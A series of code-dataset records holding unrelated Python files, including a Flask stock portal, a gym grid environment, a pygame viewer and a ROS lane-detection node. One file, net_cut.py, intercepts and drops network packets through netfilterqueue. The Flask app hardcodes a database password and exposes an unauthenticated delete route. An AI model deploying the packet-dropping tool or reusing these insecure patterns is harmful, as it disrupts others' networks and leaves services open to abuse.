\" % value).encode('utf-8'))\n element.append(div)\n except:\n element.text = value\n element.set('type', 'html')\n\n\nmime_to_atom = {\n \"application/xhtml+xml\": \"xhtml\",\n \"text/html\": \"html\",\n \"text/plain\": \"text\"\n }\n\ndef mime2atom(t):\n if t in mime_to_atom:\n return mime_to_atom[t]\n else:\n return t\n\ndef wrap(text, width):\n l = 0\n ret = []\n for s in text.split(' '):\n ret.append(s)\n l += len(s)\n nl = s.find('\\n') >= 0\n if l > width or nl:\n l = 0\n if not nl:\n ret.append('\\n')\n else:\n ret.append(' ')\n return \"\".join(ret)\n\n\n","sub_path":"build/lib.linux-x86_64-2.7/atompubbase/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"134980973","text":"from flask import Flask\nimport pymongo\nfrom pymongo import errors\nimport mysql.connector\nfrom mysql.connector import errorcode\nimport time\n\napp = Flask(__name__)\n\ndef checkmongodbconnection():\n try:\n c = pymongo.MongoClient(MONGO_URI)\n c.admin.command('ismaster')\n time.sleep(2)\n c.close()\n return True\n except pymongo.errors.ServerSelectionTimeoutError as e:\n print('Could not connect to server: %s',e)\n return False\n else:\n c.close()\n return False\n\n\n@app.route(\"/reset\")\ndef resetme():\n c = pymongo.MongoClient(\"mongodb://mongo1:27017,mongo2:27018,mongo3:27019/?replicaSet=rs0\")\n db = c.get_database(name='Stocks')\n mycol = db[\"StockData\"]\n mycol.delete_many({})\n return \"Database reset\"\n \n@app.route(\"/\")\ndef hello():\n global MYSQL_CONNECTIONSTRING\n global MONGO_URI\n\n MONGO_URI=\"mongodb://mongo1:27017,mongo2:27018,mongo3:27019/?replicaSet=rs0\"\n\n MYSQL_CONNECTIONSTRING = {\n 'user': \"mysqluser\",\n 'password': \"pass@word1\",\n 'host': 'mysqlstock',\n 'database': 'Stocks',\n 'raise_on_warnings': True,\n 'auth_plugin': 'mysql_native_password'\n }\n\n while True:\n print('Checking MongoDB Connection')\n if checkmongodbconnection()==False:\n print('Problem connecting to MongoDB, sleeping 10 seconds')\n time.sleep(10)\n else:\n break\n print('Successfully connected to MongoDB')\n\n try:\n c = pymongo.MongoClient(MONGO_URI)\n db = c.get_database(name='Stocks')\n mycol = db[\"StockData\"]\n stocks=mycol.aggregate([\n {\n '$group': {\n '_id': '$company_symbol', \n 'company_name': {\n '$first': '$company_name'\n }, \n 'price': {\n '$first': '$price'\n }, \n 'tx_time': {\n '$first': '$tx_time'\n }\n }\n }\n ])\n x=\"
<table border=1><caption>Stock securities in MongoDB</caption>\"\n for stock in stocks:\n x+='<tr>'\n x=x+'<td>' + stock[u'_id']+ '</td><td>' + stock[u'company_name'] + '</td><td>' + str(stock[u'price'])+ '</td><td>' + str(stock[u'tx_time']) + '</td></tr>'\n\n except Exception as e:\n print(\"mongo error: \" + str(e))\n \n cnx = mysql.connector.connect(**MYSQL_CONNECTIONSTRING)\n mycursor = cnx.cursor()\n\n mycursor.execute(\"SELECT DISTINCT c.company_symbol, (SELECT DISTINCT n.company_name from StockData n where n.company_symbol=c.company_symbol) as 'company_name', (SELECT MAX(p.price) from StockData p where p.company_symbol=c.company_symbol) as 'price', (SELECT MAX(t.tx_time) from StockData t where t.company_symbol=c.company_symbol) as 'tx_time' from StockData c LIMIT 10;\")\n\n myresult = mycursor.fetchall()\n\n x+=\"
</table><table border=1><caption>Stock securities in MySQL</caption>\"\n for stock in myresult:\n x+='<tr>'\n x=x+'<td>' + str(stock[0])+ '</td><td>' + str(stock[1]) + '</td><td>' + str(stock[2])+ '</td><td>' + str(stock[3]) + '</td></tr>
'\n return x\n\nif __name__ == \"__main__\":\n # Only for debugging while developing\n app.run(host='0.0.0.0', debug=True, port=80)\n","sub_path":"stockportal/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"80149559","text":"#Rafael Guimaraes Pereira\n#23.8.2021\n#This program generates the input file for Gnuplot\n#\n#How to use:\n#\n# $python gera_plot > plot.p\n# gnuplot\n# load 'plot.p'\n\nstride=2000\nn_config = 100000\nat_por_config = 500\nfinal = int(n_config/stride)\ninicial=1 #int(final/2)\n\n\nprint('set xrange [0:50]; set yrange [0:4.5];')\n#print('set palette model RGB')\nprint('set palette defined ( 0 \\\"blue\\\", 3 \\\"green\\\", 5 \\\"red\\\")')\n\n#for i in range(1,(n_config*at_por_config),at_por_config):\nfor i in range(inicial,final):\n\n a = ((i * 500) * stride) + 1\n b = a - 500\n\n\t#print('p \\\"<(sed -n \\''+str(i*stride)+','+str(i*stride+500)+'p\\' out.xyz)\\\" u 2:1:3 palette; pause 0.1;')\n print('p \\\"<(sed -n \\''+str(b)+','+str(a)+'p\\' out.xyz)\\\" u 2:1:3 palette lt 7; pause 0.0;')\n\n#lt 7: filled circle marker\n#lt 6: open circle marker","sub_path":"count-left-right/gera_plot.py","file_name":"gera_plot.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"505224499","text":"from optparse import OptionParser\nfrom pygr import *\n\nfrom pygr import worldbase\nimport pygr\nfrom pygr.seqdb import SequenceFileDB\n\nimport numpy as np\nfrom kitz_wssd.wssd_common import *\nfrom wssd_pw_common import *\n\n\ndef pad(masked,pad):\n masked_locs = arrayToNonZeroContigRanges(masked)\n contig_len = masked.shape[0]\n starts = masked_locs[:,0]-pad\n ends = masked_locs[:,1]+pad\n\n starts[np.where(starts<0)] = 0\n ends[np.where(ends>contig_len)] = contig_len\n if starts.shape[0]>0:\n flip_to_true = np.unique(np.concatenate([np.arange(aa,bb) for (aa,bb) in zip(starts,ends)]))\n masked[flip_to_true] = 1\n\n return masked\n\nif __name__==\"__main__\":\n opts = OptionParser()\n opts.add_option('','--input_fa',dest='fn_fa',default=None)\n opts.add_option('','--input_RM_fa',dest='fn_RM_fa',default=None)\n opts.add_option('','--input_TRF_fa',dest='fn_TRF_fa',default=None)\n opts.add_option('','--fn_mask_out',dest='fn_mask_out',default=None)\n opts.add_option('','--contigs',dest='fn_contigs',default=None)\n opts.add_option('','--pad',dest='pad',default=30,type=int)\n opts.add_option('','--old_to_new_contigs',dest='old_to_new_contigs')\n opts.add_option('','--limit_to_contigs',dest='fn_limit_to_contigs',default=None)\n opts.add_option('','--exclude_TRF_from',dest='fn_exclude_TRF_from',default=None)\n\n (o,args) = opts.parse_args()\n #####RIGHT NOW THIS ONLY ACCEPTS FASTAS ->BUT< could take coords too\n\n #######NOTE< kindof a cop-out, i'm just setting the one track (out of 3) to be the whole mask... ignoring the different\n #######levels for RM, TRF, etc. 
could change later \n #old_to_new_contigs = o.old_to_new_contigs!= None and dict([tuple([l.rstrip().split()[0],l.rstrip().split()[1]]) for l in open(o.old_to_new_contigs,'r').readlines()]) or None\n\n limit_to_contigs = None; \n if o.fn_limit_to_contigs != None: \n limit_to_contigs = [line.rstrip() for line in open(o.fn_limit_to_contigs).readlines() ]\n \n exclude_TRF_from = None; \n if o.fn_exclude_TRF_from != None: \n exclude_TRF_from = [line.rstrip() for line in open(o.fn_exclude_TRF_from).readlines() ]\n\n input_fa = SequenceFileDB(o.fn_fa)\n input_fa_RM = SequenceFileDB(o.fn_RM_fa)\n input_fa_TRF = SequenceFileDB(o.fn_TRF_fa)\n\n mask_track = DenseTrackSet(\n o.fn_contigs,\n o.fn_mask_out,\n True,\n 'w',\n compression=True )\n\n\n ###only one group, called, mask\n grp = \"mask\"\n mask_track.addGroup( grp ) \n mask_track[grp].addArray( tables.BoolAtom(), [3] ) \n\n for contig in input_fa:\n print(contig)\n contig = contig.replace(\".\",\"_\")\n #fa_contig=old_to_new_contigs!=None and old_to_new_contigs[contig] or contig\n char_fa_RM = np.array(str(input_fa_RM[contig]),'c')\n char_fa_TRF = np.array(str(input_fa_TRF[contig]),'c')\n print(char_fa_RM[0:100])\n print(char_fa_TRF[0:100])\n\n if limit_to_contigs == None or contig in limit_to_contigs:\n if exclude_TRF_from !=None and contig in exclude_TRF_from:\n masked = (char_fa_RM==\"N\")\n else:\n masked = (char_fa_RM==\"N\")|(char_fa_TRF==\"N\")\n\n masked = pad(masked,o.pad)\n else:\n print(\"IGNORING CURRENT CONTIG\", contig)\n masked = (char_fa_RM==\"?\")|(char_fa_TRF==\"?\") ###SHOULD EVALUATE TO ALL FALSES!\n \n print(masked[0:100])\n\n ###here, really should be putting the RM in 0, and the TRF in 1... or, other way around, can't remember :)\n mask_track['mask'][contig][:,0] = masked \n\n","sub_path":"ref_prep/scripts/make_padded_mask_from_multiple_Nd_fastas.py","file_name":"make_padded_mask_from_multiple_Nd_fastas.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"220447820","text":"from __future__ import division\nimport numpy as np\nfrom copy import deepcopy\nfrom collections import defaultdict\nimport itertools\nfrom numpy.linalg import norm\nimport gym\nfrom gym.envs.toy_text import discrete\nimport sys\nfrom scipy.spatial.distance import euclidean\n\nUP = 0\nRIGHT = 1\nDOWN = 2\nLEFT = 3\nNONE = 4\n\nclass CurrentWorld(discrete.DiscreteEnv):\n\n metadata = {'render.modes': ['human', 'ansi']}\n\n def _limit_coordinates(self, coord):\n coord[0] = min(coord[0], self.shape[0] - 1)\n coord[0] = max(coord[0], 0)\n coord[1] = min(coord[1], self.shape[1] - 1)\n coord[1] = max(coord[1], 0)\n return coord\n\n def _calculate_transition_prob(self, current, delta, winds):\n new_position = np.array(current) + np.array(delta) + np.multiply(1, self.winds_convert_dict[winds[tuple(current)]])\n new_position = self._limit_coordinates(new_position).astype(int)\n new_state = np.ravel_multi_index(tuple(new_position), self.shape)\n is_done = tuple(new_position) == self.terminal_state\n if is_done:\n return [(1.0, new_state, 0, is_done)]\n# if delta == [0,0]:\n# return [(1.0, new_state, -1, is_done)]\n return [(1.0, new_state, -1, is_done)]\n# if is_done:\n# return [(1.0, new_state, 10000000, is_done)]\n# if delta == [0,0]:\n# return [(1.0, new_state, -euclidean(np.unravel_index(new_state,self.shape),self.terminal_state), is_done)]\n# return [(1.0, new_state, -100*euclidean(np.unravel_index(new_state,self.shape),self.terminal_state), is_done)]\n\n\n\n 
def __init__(self):\n self.shape = (20, 20)\n\n nS = np.prod(self.shape)\n nA = 5\n\n # Wind strength\n winds = np.zeros(self.shape)\n# winds = add_square_current((10,10),5,self.shape)\n# winds += add_square_current((10,10),4,self.shape)\n# winds += add_square_current((10,10),3,self.shape)\n# winds += add_square_current((10,10),2,self.shape)\n \n# for i in range(1,6):\n# winds += add_square_current((30,30),i,self.shape)\n self.winds = winds\n self.winds_convert_dict = {0:[0,0],1:[0,1],2:[1,0],3:[0,-1],4:[-1,0]}\n self.start_state = (12,5)\n self.terminal_state = (15,18)\n # Calculate transition probabilities\n P = {}\n for s in range(nS):\n position = np.unravel_index(s, self.shape)\n P[s] = { a : [] for a in range(nA) }\n P[s][UP] = self._calculate_transition_prob(position, [-1, 0], winds)\n P[s][RIGHT] = self._calculate_transition_prob(position, [0, 1], winds)\n P[s][DOWN] = self._calculate_transition_prob(position, [1, 0], winds)\n P[s][LEFT] = self._calculate_transition_prob(position, [0, -1], winds)\n P[s][NONE] = self._calculate_transition_prob(position, [0, 0], winds)\n\n# Set start point\n isd = np.zeros(nS)\n isd[np.ravel_multi_index(self.start_state, self.shape)] = 1.0\n\n super(CurrentWorld, self).__init__(nS, nA, P, isd)\n \n def show_img(self):\n world = deepcopy(self.winds)\n world[np.unravel_index(self.s,self.shape)] = 7\n plt.imshow(world)\n\n\ndef limit_coordinates(coord,world):\n coord[0] = min(coord[0], np.shape(world)[0] - 1)\n coord[0] = max(coord[0], 0)\n coord[1] = min(coord[1], np.shape(world)[1] - 1)\n coord[1] = max(coord[1], 0)\n return coord\n\ndef add_square_current(center,radius,world_shape,direction='cw'):\n world = np.zeros(world_shape)\n vertical_boundary = [center[0]-radius, center[0]+radius]\n vertical_boundary = limit_coordinates(vertical_boundary,world)\n horizontal_boundary = [center[1]-radius, center[1]+radius]\n horizontal_boundary = limit_coordinates(horizontal_boundary,world)\n vertical_index = np.linspace(vertical_boundary[0],vertical_boundary[1],vertical_boundary[1]+1-vertical_boundary[0])\n horizontal_index = np.linspace(horizontal_boundary[0],horizontal_boundary[1],horizontal_boundary[1]+1-horizontal_boundary[0])\n xx, yy = np.meshgrid(vertical_index,horizontal_index)\n x_range = np.array([np.amin(xx),np.amax(xx)]).astype(int)\n y_range = np.array([np.amin(yy),np.amax(yy)]).astype(int)\n xxyy = zip(xx,yy)\n coord = []\n for i,j in xxyy:\n coord += zip(i,j)\n coord = np.array([np.array(i).astype(int) for i in coord])\n boundary_index = []\n for i,j in coord:\n if i in x_range or j in y_range:\n boundary_index += [[i,j]]\n# 1:right, 2:down, 3:left, 4:up, 0:no current\n if direction == 'cw':\n world[y_range[0]:y_range[1]+1,x_range[0]] = 4\n world[y_range[0]:y_range[1],x_range[1]] = 2\n world[y_range[0],x_range[0]:x_range[1]] = 1\n world[y_range[1],x_range[0]+1:x_range[1]+1] = 3\n elif direction == 'ccw':\n world[y_range[0]:y_range[1]+1,x_range[0]] = 2\n world[y_range[0]:y_range[1],x_range[1]] = 4\n world[y_range[0],x_range[0]:x_range[1]] = 3\n world[y_range[1],x_range[0]+1:x_range[1]+1] = 1\n else:\n raise AttributeError(\"Direction input is not correct, please use 'cw' or 'ccw'\")\n return world\n","sub_path":"DDQN/env_current.py","file_name":"env_current.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"577792785","text":"#!/usr/bin/env python\n\nimport netfilterqueue\nimport scapy as scapy\n\n\ndef process_packet(packet):\n scapy_packet= 
scapy.IP(packet.get_payload())\n print(scapy_packet.show())\n packet.drop()\n\n\nqueue = netfilterqueue.NetfilterQueue()\nqueue.bind(0, process_packet)\nqueue.run()\n","sub_path":"net_cut/net_cut.py","file_name":"net_cut.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582862379","text":"import pygame\nimport time\n\nmap = [\n \" XXXXX \",\n \" X XXXX\",\n \" X X X\",\n \" XX tX\",\n \"XXX XXXtX\",\n \"X b X XtX\",\n \"X bbX XXX\",\n \"Xa X \",\n \"XXXXX \",\n]\n\nmap_dict = {\n \" \": pygame.image.load(\"floor.png\"),\n \"X\": pygame.image.load(\"wall.png\"),\n \"b\": pygame.image.load(\"box.png\"),\n \"B\": pygame.image.load(\"box_on_target.png\"),\n \"a\": pygame.image.load(\"player.png\"),\n \"A\": pygame.image.load(\"player_on_target.png\"),\n \"t\": pygame.image.load(\"box_target.png\")\n}\n\n\n\npygame.init() # Prepare the PyGame module for use\nmain_surface = pygame.display.set_mode((16*len(map[0]), 16*len(map)))\n\n\nwhile True:\n\n # Look for an event from keyboard, mouse, joystick, etc.\n ev = pygame.event.poll()\n if ev.type == pygame.QUIT: # Window close button clicked?\n break # Leave game loop\n\n\n # Completely redraw the surface, starting with background\n main_surface.fill((255, 255, 255))\n\n for i in range(len(map)):\n for j in range(len(map[i])):\n # Copy our image to the surface, at this (x,y) posn\n main_surface.blit(map_dict[map[i][j]], (j*16, i*16))\n\n # Now that everything is drawn, put it on display!\n pygame.display.flip()\n\npygame.quit()\n\n","sub_path":"sokoban_pygame/pygame_playground.py","file_name":"pygame_playground.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"469216226","text":"__author__ = 'Dawid'\n\n# do punktu (x,y) moża dojść z punktów {...} z danym kosztem.\ncosts = {\n '(1,0)': {\n '(0,0)': 4\n },\n '(2,0)': {\n '(1,0)': 1\n },\n '(3,0)': {\n '(2,0)': 2\n },\n '(4,0)': {\n '(3,0)': 3\n },\n '(0,1)': {\n '(0,0)': 6\n },\n '(1,1)': {\n '(1,0)': 4,\n '(0,1)': 3\n },\n '(2,1)': {\n '(2,0)': 3,\n '(1,1)': 2\n },\n '(3,1)': {\n '(3,0)': 3,\n '(2,1)': 2\n },\n '(4,1)': {\n '(4,0)': 2,\n '(3,1)': 2\n },\n '(0,2)': {\n '(0,1)': 10\n },\n '(1,2)': {\n '(1,1)': 4,\n '(0,2)': 2\n },\n '(2,2)': {\n '(2,1)': 2,\n '(1,2)': 3\n },\n '(3,2)': {\n '(3,1)': 3,\n '(2,2)': 2\n },\n '(4,2)': {\n '(4,1)': 2,\n '(3,2)': 1\n },\n '(0,3)': {\n '(0,2)': 20\n },\n '(1,3)': {\n '(1,2)': 8,\n '(0,3)': 1\n },\n '(2,3)': {\n '(2,2)': 3,\n '(1,3)': 2\n },\n '(3,3)': {\n '(3,2)': 2,\n '(2,3)': 2\n },\n '(4,3)': {\n '(4,2)': 3,\n '(3,3)': 2\n },\n '(0,4)': {\n '(0,3)': 25\n },\n '(1,4)': {\n '(1,3)': 10,\n '(0,4)': 3\n },\n '(2,4)': {\n '(2,3)': 4,\n '(1,4)': 3\n },\n '(3,4)': {\n '(3,3)': 3,\n '(2,4)': 3\n },\n '(4,4)': {\n '(4,3)': 2,\n '(3,4)': 2\n }\n}\n\npaths = {\n '(0,0)': {\n '(0,0)': 0\n }\n}\n\ngrid_size = 5\n\n\ndef generate_paths(destination):\n global paths\n global costs\n global grid_size\n\n for i in range(0, grid_size):\n for j in range(0, grid_size):\n point = '({0},{1})'.format(j, i)\n\n if point != '(0,0)':\n ways = costs[point]\n\n print('@point:', point, ':', ways)\n\n for p in ways:\n print('way:', p)\n\n if p in paths:\n print('Droga do', p, 'jest w wygenerowanych scizkach')\n\n paths_temp = {}\n\n for path in paths:\n\n if path in paths[p]:\n cost = paths[p][path]\n print('sciezka', path, 'ma koszt', cost)\n\n new_path = path + point\n new_path_cost = cost 
+ ways[p]\n print('new path:', new_path, 'cost:', new_path_cost)\n\n # Moze byc koniecznie sprawdzenei istniejących wartości ściezek, zeby wybrac optymalna\n paths_temp[new_path] = new_path_cost\n\n for tmp in paths_temp:\n if point not in paths:\n paths[point] = {tmp: paths_temp[tmp]}\n else:\n paths[point][tmp] = paths_temp[tmp]\n\n print('paths new:', paths)\n\n else:\n print('Drogi do', p, 'nie ma w wygenerowanych scizkach. Pobieram je z tabeli kosztów.')\n print('costs[{0}]: {1}'.format(p, costs[p]))\n\n for prv in costs[p]:\n if prv in paths:\n prv_paths = paths[prv]\n\n best_path = min(prv_paths, key=prv_paths.get)\n cost = paths[prv][best_path]\n new_cost = cost + costs[p][prv]\n new_path = best_path + p\n print('New path:', new_path)\n\n if p not in paths:\n paths[p] = {new_path: new_cost}\n else:\n paths[p][new_path] = new_cost\n\n else:\n print('Punktu', prv, 'nie ma w paths. Trzeba go dodac')\n\n final_point = '({0},{1})'.format(grid_size-1, grid_size-1)\n if point == final_point:\n for prv in costs[final_point]:\n if prv in paths:\n prv_paths = paths[prv]\n best_path = min(prv_paths, key=prv_paths.get)\n cost = paths[prv][best_path]\n new_cost = cost + costs[final_point][prv]\n new_path = best_path + final_point\n\n if final_point not in paths:\n paths[final_point] = {new_path: new_cost}\n else:\n paths[final_point][new_path] = new_cost\n else:\n print('Punktu', final_point, 'nie ma w paths. MAMY PROBLEM!!!!!!!!!!!!!!!!!!!!')\n print('\\n')\n\n print('\\nFinal paths:')\n\n c = 1\n for s in paths:\n print('{0}.\\t{1}: {2}'.format(c, s, paths[s]))\n c += 1\n\n solutions = paths[destination]\n if len(solutions) > 0:\n best_solution = min(solutions, key=solutions.get)\n return '{0} : {1}'.format(best_solution, solutions[best_solution])\n else:\n return None\n\n\ndef main():\n destination = '(4,4)'\n solution = generate_paths(destination)\n\n print('\\n=========================================')\n print('Best way:')\n print(solution)\n\n\nif __name__ == '__main__':\n main()","sub_path":"zad1_grid/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"531346789","text":"# ch12_22.py\nfrom tkinter import *\n\n\nroot = Tk()\nroot.title(\"ch12_22\") # 視窗標題\n\nscrollbar = Scrollbar(root) # 建立捲軸\nscrollbar.pack(side=RIGHT, fill=Y)\n\n# 建立Listbox, yscrollcommand指向scrollbar.set方法\nlb = Listbox(root, yscrollcommand=scrollbar.set)\nfor i in range(50): # 建立50筆項目\n lb.insert(END, \"Line \" + str(i))\nlb.pack(side=LEFT,fill=BOTH,expand=True)\n\nscrollbar.config(command=lb.yview)\n\nroot.mainloop()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"_4.python/__code/Python GUI 設計活用 tkinter之路/ch12/ch12_22.py","file_name":"ch12_22.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610920328","text":"#!/usr/bin/env python\n\n\n\nimport rospy\nimport cv2\nimport numpy as np\nimport math\nimport time\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Float64\nfrom geometry_msgs.msg import Point\nfrom std_msgs.msg import Bool\nfrom sensor_msgs.msg import Image\nfrom sensor_msgs.msg import CompressedImage\nfrom matplotlib import pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom cv_bridge import CvBridge, CvBridgeError\nimport sys\n\n'''\n#--------------------------------------------------------------------------------------\n# definition des 
variable\n#-------------------------------------------------------------------------------------\n\nymin = 80\nymax =81\nxmin1=0\nxmax1=90\nxmin2=230\nxmax2=320\n#previous_line_parameters = 0,0\n'''\n#-------------------------------------------------houghlines---------------------------------------\n\n\nthetaf=[]\nTime= time.time()\n\n\n\n\n\nrho = 2\ntheta=1*np.pi/180\nthreshold = 55\nmin_line_length = 30\nmax_line_gap = 20\n\n#--------------------------------------------------------------------------------------------------\n\n#--------------------------------------------region of interest -----------------------------------\n\n\ntrap_bottom_width = 1\ntrap_top_width = 0.9\ntrap_height = 0.4\n\n\n#--------------------------------------------------------------------------------------------------\n#lane_lines = []\nx = False ; \nbridge=CvBridge() ; \nang_cl = Point()\nang_cl.x=0.0\nang_cl.y=0.0\nang_cl.z=0.0\ns1_old = None\nx_offset_old = 1.0\nY_offset_old = 1.0\ns1_time = 0.0\npub = None\npub1 = None\npub2 = None\n\n#-----------------------------------------------filtre alpha beta---------------------------------------------\nalpha = 0.75\nbeta = 0.001\nprediction = 0.0\nestimate = 0.0\nsample_time = 0.033\nrate = 1\n\n\n\n\n#--------------------------------------------------------------------------------------------------\n\n\n#----------------------------------------------------------------------------------------\n# definition des foncitons\n#--------------------------------------------------------------------------------------\n\n\n\n\n\n\n##partie inspiré de Tian, D. (2019).Deeppicar — part 4 : Autonomous lane navigation via opencv.Consult ́e surhttps://towardsdatascience.com/deeppicar-part-4-lane-following-via-opencv-737dd9e47c96\n\ndef give_angle(image, average_line):\n global x\n global s1_time \n global x_offset_old\n global Y_offset_old\n global prediction\n global rate\n global estimate \n global sample_time\n global alpha\n global beta\n\n error_manager = Bool()\n height = image.shape[0]\n width = image.shape[1]\n\n if len(average_line) ==1 :\n x1, _, x2, _ = average_line[0]\n x_offset = x2-x1\n y_offset = int(height/2)\n x_offset_old =x_offset\n Y_offset_old = y_offset\n elif len(average_line) ==2 : \n _, _, left_x2, _= average_line[0]\n _, _, right_x2, _= average_line[1]\n mid = int(width/2)\n x_offset = (left_x2+right_x2)/2 - mid\n y_offset = int(height/2)\n x_offset_old =x_offset\n Y_offset_old = y_offset\n #----------------------------------------------------------------------------------------------------------------------------\n if len(average_line) == 0 and x == False:\n \n s1_time= time.time()\n x= True \n elif len(average_line) != 0 :\n s1_time = 0.0\n x = False ; \n \n\n global t1\n t1 =time.time()-s1_time\n \n if t1 < 2 and len(average_line) == 0 :\n x_offset = Y_offset_old\n y_offset = Y_offset_old\n error_manager.data = False\n print(\"temps correct........continuation de la conduite\")\n pub.publish(error_manager)\n t1 =time.time()-s1_time\n\n if t1 > 2 and len(average_line) == 0 :\n error_manager.data = True\n print(\"ligne(s) disparue(s)...... 
amorcage de l'arret d'urgence\")\n pub.publish(error_manager)\n t1 =time.time()-s1_time\n\n #if error_manager.data == False :\n angle_rad = math.atan(x_offset/y_offset)\n angle_deg = int (angle_rad* 180.0 / math.pi)\n angle_f = angle_deg + 90\n return angle_f\n\n\ndef display_heading_line(image, angle , color = (0,0,255),line_w = 2) :\n heading_image = np.zeros_like(image)\n height = image.shape[0]\n width = image.shape[1]\n \n angle_F = angle / 180.0 * math.pi\n\n x1 = int(width/2)\n y1=height\n x2 = int(x1 - height/ 2 / math.tan(angle_F))\n y2 = int(height/2)\n\n cv2.line(heading_image,(x1,y1),(x2,y2),color,line_w)\n heading_image = cv2.addWeighted(image,0.8,heading_image,1,1)\n return heading_image\n\n#partie inspire de Slim, R. (2020).The complete self-driving car course - applied deep learning.Consult ́e surhttps://www.udemy.com/course/applied-deep-learningtm-the-complete-self-driving-car-course/\n\n \ndef make_coordinates(image, line_parameters):\n ''' global previous_line_parameters\n if line_parameters == None : \n line_parameters = previous_line_parameters\n ''' \n height = image.shape[0]\n width = image.shape[1]\n slope, intercept = line_parameters\n y1 = height\n y2=int(y1*(1-trap_height))\n x1 = max((-width,min(2*width,int(y1-intercept)/slope)))\n x2 = max((-width,min(2*width,int(y2-intercept)/slope)))\n return np.array([x1,y1,x2,y2])\n\n\ndef average_slope_intercept(image,lines):\n lane_lines =[]\n error_manager = Bool()\n if lines is None:\n return lane_lines\n global s1_old \n s1_old= lane_lines\n left_fit= []\n right_fit = []\n\n for line in lines:\n x1,y1,x2,y2 = line.reshape(4)\n # if x1 ==x2:\n # slopet = 999.\n slopet = (y2-y1)/(x2-x1)\n #------------!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!checker reaction du filtrage des lignes\n #if abs(slopet) < 800 : \n parameters = np.polyfit((x1,x2),(y1,y2),1)\n slope = parameters[0]\n intercept = parameters[1]\n if slope < 0 :\n left_fit.append((slope,intercept))\n else:\n right_fit.append((slope,intercept))\n\n left_fit_average = np.average(left_fit,axis = 0)\n if len(left_fit) >0:\n lane_lines.append(make_coordinates(image,left_fit_average))\n\n right_fit_average = np.average(right_fit,axis = 0)\n if len(right_fit) >0:\n lane_lines.append( make_coordinates(image,right_fit_average))\n\n \n if len(lane_lines) !=0 :\n error_manager.data = False\n pub.publish(error_manager)\n\n return lane_lines\n\n\n\ndef canny(image):\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray,(5,5),0)\n canny_img=cv2.Canny(blur,220,150)\n return canny_img\n\ndef display_lines(image,lines) : \n line_image = np.zeros_like(image)\n if lines is not None:\n for line in lines:\n x1,y1,x2,y2 = line.reshape(4)\n pts = np.array([[x1,y1],[x2,y2]],np.int32)\n cv2.polylines(line_image,[pts],True, (255,255,0),3)\n\n return line_image\n\n\ndef region_of_interest(image):\n h = image.shape[0]\n w = image.shape[1]\n polygons = np.array([[\\\n ((w*(1-trap_bottom_width))//2,h),\\\n ((w*(1-trap_top_width))//2,h-h*trap_height),\\\n (w-(w*(1-trap_top_width))//2,h-h*trap_height),\\\n (w-(w*(1-trap_bottom_width))//2,h) ]]\\\n , dtype=np.int32)\n mask = np.zeros_like(image)\n cv2.fillConvexPoly(mask,polygons,255)\n masked_image =cv2.bitwise_and(image,mask)\n\n return masked_image\n\n\n##=======================================================================================\n\ns1_old = 0\ns2_old = 0\ns1 = 0\nt1 = 0.0\nt2 = 0.0\ns2 = 0\n\ns2_time = 0.0\nth1 = 75\nth2 = 150\nstop =0\nk= 1 \n\n# 
======================================================================================== \n\n\ndef callback(image):\n global ang_cl\n global thetaf\n global Time\n #ang_cl.y est la valeur precedente\n ang_cl.y = ang_cl.x\n try :\n img = bridge.imgmsg_to_cv2(image, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n\n #prendre les colonne, ligne et channel\n (ligne,colonne,channels) = img.shape\n print (ligne)\n print (colonne)\n #cv2.imshow('try',img)\n key = cv2.waitKey(10) & 0xFF\n if key == ord(\"q\"):\n raise Exception(\"on sort\")\n\n # faire copy de l'image\n img_clone = img.copy()\n\n #-------------------newcod------------------------------------------ \n\n canny_image = canny(img_clone)\n cropped_image = region_of_interest(canny_image)\n \n lines = cv2.HoughLinesP(cropped_image,rho,theta,threshold,np.array([]),minLineLength=min_line_length\n ,maxLineGap=max_line_gap)\n averaged_lines = average_slope_intercept(img_clone,lines)\n \n\n\n line_image = display_lines(img_clone,averaged_lines)\n \n combo_image = cv2.addWeighted(img_clone,0.8,line_image,1,1)\n angle = give_angle(combo_image, averaged_lines)\n #ang_cl.x est la nouvelle valeur\n anglep = angle-90\n anglepp = anglep / 180.0 * math.pi\n ang_cl.x = anglepp\n print(anglepp)\n #T1 = time.time() - Time\n # thetaf.append((T1 , anglepp))\n \n\n #update_fonc()\n #plt.show()\n #ang_cl.z est le nombre de ligne\n ang_cl.z = len(averaged_lines)\n #publier les informations\n pub1.publish(ang_cl)\n final_image= display_heading_line(combo_image , angle)\n cv2.imshow('Afficher camera',final_image)\n #---------------------fin code--------------------------------------- \n\n'''\n #transformer l'imagae en gris pour capteur 1\n gris = cv2.cvtColor(img_clone[ymin:ymax, xmin1:xmax1],cv2.COLOR_BGR2GRAY)\n if k!=1:\n gris = cv2.blur(gris,(k,k))\n \n #appliquer canny\n capteur1 = cv2.Canny(gris,th1,th2)\n\n #transformer l'imagae en gris pour capteur 2\n gris2 = cv2.cvtColor(img_clone[ymin:ymax, 